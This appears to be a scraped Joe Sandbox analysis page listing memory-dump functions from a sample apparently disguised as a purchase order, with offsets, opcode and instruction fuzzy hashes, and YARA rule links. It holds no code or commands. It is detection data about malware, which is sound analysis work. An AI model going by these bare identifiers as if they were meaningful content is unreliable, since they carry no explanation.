Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2f189935e178dd38ba1d296465033660cf7b6abcf28dd5a32cbe94b8a8296a0
Instruction ID: ad9548ea72729e3c43c662c0a2c1973a80a470e8ca0a2eb8b07c3ff3207804db
Opcode Fuzzy Hash: a2f189935e178dd38ba1d296465033660cf7b6abcf28dd5a32cbe94b8a8296a0
Instruction Fuzzy Hash: A33103B15002018BDB61AF58C841BFA7BB4AF51318F54C1AAD9C99B386DE39E9C1CF90

Function 00FFE3C0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4197bea0b2f5e21399fff1c8bd883c53ba134a7fbb4d6e52d23f7d47c2de41dc
Instruction ID: 9ffae6fb18fb0d4a465951eab923484854dd79a97b0e444a8b97d4da224f122c
Opcode Fuzzy Hash: 4197bea0b2f5e21399fff1c8bd883c53ba134a7fbb4d6e52d23f7d47c2de41dc
Instruction Fuzzy Hash: 4631C436A4052CABDB31DA14CC81FFAB7B9AF15750F1100A9E785A72B0D6749E819FA0

Function 01006D91 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4192caa92fbb0db4cf6c736216330f8fd9f6d6c65272dbb19f2e102154745510
Instruction ID: c9eccf12aaf5ed7916c8e4738f502df72ac88ee022b2872a45503ec6973cdd56
Opcode Fuzzy Hash: 4192caa92fbb0db4cf6c736216330f8fd9f6d6c65272dbb19f2e102154745510
Instruction Fuzzy Hash: E131D67190020A9FE721DF68C840BAEF7F9FF81314F1443AAE9959B1D2CB749985C791

Function 010343D0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01c9ecc225485beb84fdf102d07da410173bc6dcc4b4498d77604cd4c50ce9d6
Instruction ID: 270cef870e3f940c887a5e508944d98c2412c58275f6cc2118a20f7195527efd
Opcode Fuzzy Hash: 01c9ecc225485beb84fdf102d07da410173bc6dcc4b4498d77604cd4c50ce9d6
Instruction Fuzzy Hash: F0218F726047559BCB21DE58C880B6BB7E9FFC9720F058569F9989B241DB30E901CBA2

Function 010344A8 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
Instruction ID: ccd1001459c5629690271003f9860eeb59dbb056fa45353e1790c4861bc9b31e
Opcode Fuzzy Hash: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
Instruction Fuzzy Hash: 48216075E00605ABCB11CFA8C980A9EBFA9FF89324F108475ED45DF682D771EE058B90

Function 0107E289 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecc81d0849b06bf0506844d6845ce782af624efa095b4a2420d387404cfc4268
Instruction ID: 3095b33ccee11f0ca087e8ee567643dad60e44e343f44fb5af7c426efd0902dd
Opcode Fuzzy Hash: ecc81d0849b06bf0506844d6845ce782af624efa095b4a2420d387404cfc4268
Instruction Fuzzy Hash: BC316F75A00215EFCB14CF1CC4889EEB7F5FF84704B1584A9E8899B351E731E951CB94

Function 00FFE328 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1500e7d27353e492cd4aac5f88e20bbb0655133e18b835bb5c34c4425610e60d
Instruction ID: e31bbceaf63b21f27c6af353d7595970ad2e63ba44fb7bed38a999bf1101c42b
Opcode Fuzzy Hash: 1500e7d27353e492cd4aac5f88e20bbb0655133e18b835bb5c34c4425610e60d
Instruction Fuzzy Hash: F9319A31600649EFD721CB68C884FAABBF8FF45754F2444A9E952DB2A0E730EE01DB50

Function 010D010E Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67b924dc05e0df0832ce327b79fe9cae44fe482bc5bf4605d717cd614eccd9b
Instruction ID: d1f9af6caf6d6ab2368470fbd1a0354b3eb79101dbc83cd1286ca88adb6ad4e3
Opcode Fuzzy Hash: a67b924dc05e0df0832ce327b79fe9cae44fe482bc5bf4605d717cd614eccd9b
Instruction Fuzzy Hash: 7721D13A6103058FD728CE3DD8806AA77E2EF84300F5585B8FA99CB25AD774E845CB90

Function 01008C79 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6500f08a74af63fbfd20657ae4f9c8e6d1ec2716c2b9bdce45284f75af2ea64d
Instruction ID: 3048b722babb337365ab13cf5e146c315a0fe4053c3f9fabb9ae6ac615eaed0b
Opcode Fuzzy Hash: 6500f08a74af63fbfd20657ae4f9c8e6d1ec2716c2b9bdce45284f75af2ea64d
Instruction Fuzzy Hash: DE213331A02A86ABE72A972DCC15B297BECBF40760F0940E5DDC29B7D2E778DC40C250

Function 00C2E657 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 257e9a30f3a89b749cee4ca066c61eb527bc855569026e8837eb784e1d360224
Instruction ID: d44f808f5d59475518376229e6555f1339afd5e049090cc854c0ed3aab054f68
Opcode Fuzzy Hash: 257e9a30f3a89b749cee4ca066c61eb527bc855569026e8837eb784e1d360224
Instruction Fuzzy Hash: 4C31E130A043589FCB14DF79D881BABB7F6FF99300F058859E966ABA41C671A906CB50

Function 01080371 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08e439251985abdface9a9d547e5d44a5bb94db0a0f2f9cc1e00bb59e6941581
Instruction ID: 0a038935119458de026469c071e1ff21af02810735b6003f2daef3aa4908ebaa
Opcode Fuzzy Hash: 08e439251985abdface9a9d547e5d44a5bb94db0a0f2f9cc1e00bb59e6941581
Instruction Fuzzy Hash: 66219F71900629ABCF20EF59C881AFEB7F8FF48704B554069F981EB244D778AD41CBA0

Function 00C2E663 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6958e53d1b94da485f9f1ad0bfdceb7f3288e279316926c9576ca279f9eaaa4d
Instruction ID: 304b8f9ca23a440f19d83606f264b950089e8f4c03303e040667459ca7e5a5a4
Opcode Fuzzy Hash: 6958e53d1b94da485f9f1ad0bfdceb7f3288e279316926c9576ca279f9eaaa4d
Instruction Fuzzy Hash: 6E212430A003589BDB14DF78D881BAFB7F1FF99300F068869E966AB741C670E905CB40

Function 010A6D79 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30bc1699c9e8ddbf10173d37c4bb3490b8af24f9a182597d9e829a3816b7eb3b
Instruction ID: 8d7ccc930ac810085dd9f79621977bfed081e7d4a7603f08395c952f2263f9b4
Opcode Fuzzy Hash: 30bc1699c9e8ddbf10173d37c4bb3490b8af24f9a182597d9e829a3816b7eb3b
Instruction Fuzzy Hash: D1210331A047818BC721EBB9C844AAFB7E9EFC0314F48496DE6E683141CB32A9498795

Function 01022755 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4750ed672a414022f9042c19aaf09e4b0ca0db19d64592625bfe38a73ff159ad
Instruction ID: 712428360c1089d7e67c497b9ce6ae4293788a9641605f9e9bd4f68633ce2933
Opcode Fuzzy Hash: 4750ed672a414022f9042c19aaf09e4b0ca0db19d64592625bfe38a73ff159ad
Instruction Fuzzy Hash: 58212931749691DBF322676C8D44F287BD9BB01B30F1807E0EAA0AF6D2D76888408200

Function 0107CD40 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7477e4733c3d8ac1b6be6b0fe7f659da3ee30cf32468bb8c8f799742df5ae00d
Instruction ID: e23996278f8809dbc99c8fcfb1505ccb7130fce31462a3c8141cf4685212cee2
Opcode Fuzzy Hash: 7477e4733c3d8ac1b6be6b0fe7f659da3ee30cf32468bb8c8f799742df5ae00d
Instruction Fuzzy Hash: 7D21C272A447069BE321AF18D941B9B7BE4FB88B20F10052EF9859B390D374ED4087E9

Function 00C23205 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f15740ff40cb25e56c0d0e5e5bebcb5d210464bc85caaa2ec13f48d389d94388
Instruction ID: 14091c05cd795f530147c639819b8a96a30cff2eb5d99ed8a076ac61b68a5f8a
Opcode Fuzzy Hash: f15740ff40cb25e56c0d0e5e5bebcb5d210464bc85caaa2ec13f48d389d94388
Instruction Fuzzy Hash: 49112E73E14A209F9364CEA9E941967F7E4EF88350341867EDA5DD3A00D634FD1187C0

Function 0103A22B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 758eef2893704a42ccdff7425dbca42f0f20cd37ffd69c7a57e1fc3c078829ad
Instruction ID: de1a17b93254e41e32ef9bfef86eb92615fc7bf6cf86d0d8254fb8e7661440ef
Opcode Fuzzy Hash: 758eef2893704a42ccdff7425dbca42f0f20cd37ffd69c7a57e1fc3c078829ad
Instruction Fuzzy Hash: A5219A75600A11EFC725DF29C841B46B7F4BF48B04F14846CA599CBB52E332E842CB98

Function 010805C6 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 088bc22d62b3673f3e2235339bce09e47a8943670d708c40d58f2de9f60dc263
Instruction ID: dad756a9886a46907e24869cd5c2f4f75de74a8c8e051ce9cdb971cc473f4a14
Opcode Fuzzy Hash: 088bc22d62b3673f3e2235339bce09e47a8943670d708c40d58f2de9f60dc263
Instruction Fuzzy Hash: 962125B0E00208ABCB20DFAAD881AAEFBF9FF98714F20016FE545A7254D7759941CF54

Function 010CE9A6 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 421a3415f8e6b25f74f3e1b9747496f63a52a2e5dcfca85c646d02ad1a195807
Instruction ID: 05e9c23fec1fe3067448467f81074cfb48d1887411c0c0f30057d1a4e45f6ada
Opcode Fuzzy Hash: 421a3415f8e6b25f74f3e1b9747496f63a52a2e5dcfca85c646d02ad1a195807
Instruction Fuzzy Hash: DB21A233A108159F9B18CB3CC8054AAF7E6EFCC31436A827ED952DB664D674B9158A84

Function 01080AFF Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13713ae3679b8fc7dd337d9f1c4a977e82be565be37b33d727eef130908249a9
Instruction ID: 2c0ce2e70a21fe429d490016ae9481875eefd397fc61957c7bc0583d9225912b
Opcode Fuzzy Hash: 13713ae3679b8fc7dd337d9f1c4a977e82be565be37b33d727eef130908249a9
Instruction Fuzzy Hash: 9621A172500A04ABC725EF59D894E9BBBE8EF48744F10056DF686CB654E634E900CB64

Function 01030044 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f51349cb896017fc9ab8a9f608891aec5cae7a645b455a070eaa6e1832f3fc66
Instruction ID: 6c2aa9c53e5d4e8daf3b5265f44add2218caa621652ff6a9bc2221bdd39ab48e
Opcode Fuzzy Hash: f51349cb896017fc9ab8a9f608891aec5cae7a645b455a070eaa6e1832f3fc66
Instruction Fuzzy Hash: 8F11EF72600A09AFE7229F94CC41F9EBBACEBC0754F10846AFB809F140D672ED45CB60

Function 01008690 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09f338293569eeec9c1b572ff9dde26d561c7445dac063a50c8e3ced33d64f75
Instruction ID: c6eed5b9ed21fbec364fbaeb6a0537afb04e5548a2b6f21c4b730fe4ef5b1537
Opcode Fuzzy Hash: 09f338293569eeec9c1b572ff9dde26d561c7445dac063a50c8e3ced33d64f75
Instruction Fuzzy Hash: D711B635B01611DBAB52CF4DC88096ABBE5BF4A750F15C0BEEE489F245D6B2E9018B90

Function 0103AA0E Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc3492ee58ae507e05650e1380ccd0cbe77e5c14439bc1406ce94b79f981a113
Instruction ID: 0f5590592e78cd225ccda73d0336adece7f5f18d857a45e84352f681da4c83ec
Opcode Fuzzy Hash: bc3492ee58ae507e05650e1380ccd0cbe77e5c14439bc1406ce94b79f981a113
Instruction Fuzzy Hash: 1C217C72640A45DFD7328F49C640A6ABBE9FBD4B10F15846DE5C6CB621C735DC02CB80

Function 010A4AC2 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
Instruction ID: 3e19c5b690fc34051a6d824ba8be32f436b3e8d70583782691ff381d0285d9ef
Opcode Fuzzy Hash: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
Instruction Fuzzy Hash: 01215E75A00219EFCB05CF89C880AEEFBB5FF98304F5540A9E445EB351DA719E41CBA0

Function 01008009 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca96d97a4e9bb7241b01cae68383390ea8c9acdea7e3794e56da679f4f792b97
Instruction ID: 77939b882c615ad5e7cfc8e60ddf6935b01ed2272e937bf9db22ea95e3c10699
Opcode Fuzzy Hash: ca96d97a4e9bb7241b01cae68383390ea8c9acdea7e3794e56da679f4f792b97
Instruction Fuzzy Hash: 41219F31A00205DFDB55CF58C580AAEBBF5FB88318F2081AEE145AB350CB72AD02CBD0

Function 0108CD00 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4faf48868d624e4ab0a86329b8dcd663a53596bb5578467c515a0ea23e1dccc3
Instruction ID: 4d4494bda26000540659575ac77cc57e4f748c732717696f08a025eadea2393b
Opcode Fuzzy Hash: 4faf48868d624e4ab0a86329b8dcd663a53596bb5578467c515a0ea23e1dccc3
Instruction Fuzzy Hash: E5112531140241ABD332BF29C940FA67BB8FF917B4F20446CF6C54B691DA39D901C7A0

Function 0103666D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70287b70f28d3560848207ef3fc2be1415a38bfc7964e7a570ec36b01a601d57
Instruction ID: ecb85b065bb72b23ba95704f4d4e16c14d10c554c1562f75279aefafbef47fc9
Opcode Fuzzy Hash: 70287b70f28d3560848207ef3fc2be1415a38bfc7964e7a570ec36b01a601d57
Instruction Fuzzy Hash: 79218971600A01EFD7719F68D881FA6B7F8FB88650F40882DE5DAD7650DA31AA40DB60

Function 01096400 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd633f25fa083a7ad74a66d9abfb6ef67b69822bca52f76336a615e16ef2ea73
Instruction ID: ead935b390306b5e34b0a844aed9436e4385c863ce2a616254c9b71f0a6361c6
Opcode Fuzzy Hash: fd633f25fa083a7ad74a66d9abfb6ef67b69822bca52f76336a615e16ef2ea73
Instruction Fuzzy Hash: 9F11E332280600ABCB22DB9DCD50F8B77E9EB5AB64F014065F284DB251DE76E801D790

Function 0102E7E0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bfcf1f9d5f633144b146f856d5fe78bb38d2306d2848f29aa2947097215fd24
Instruction ID: 6f90ec226ab47df18b3635e300cc79c87ed25389782ceede6ced3d04baa1d644
Opcode Fuzzy Hash: 2bfcf1f9d5f633144b146f856d5fe78bb38d2306d2848f29aa2947097215fd24
Instruction Fuzzy Hash: C51166733001119FCB29DB28CCD1A6F729AFBC5370B24413CEA968B294E971DC02C390

Function 010365D0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
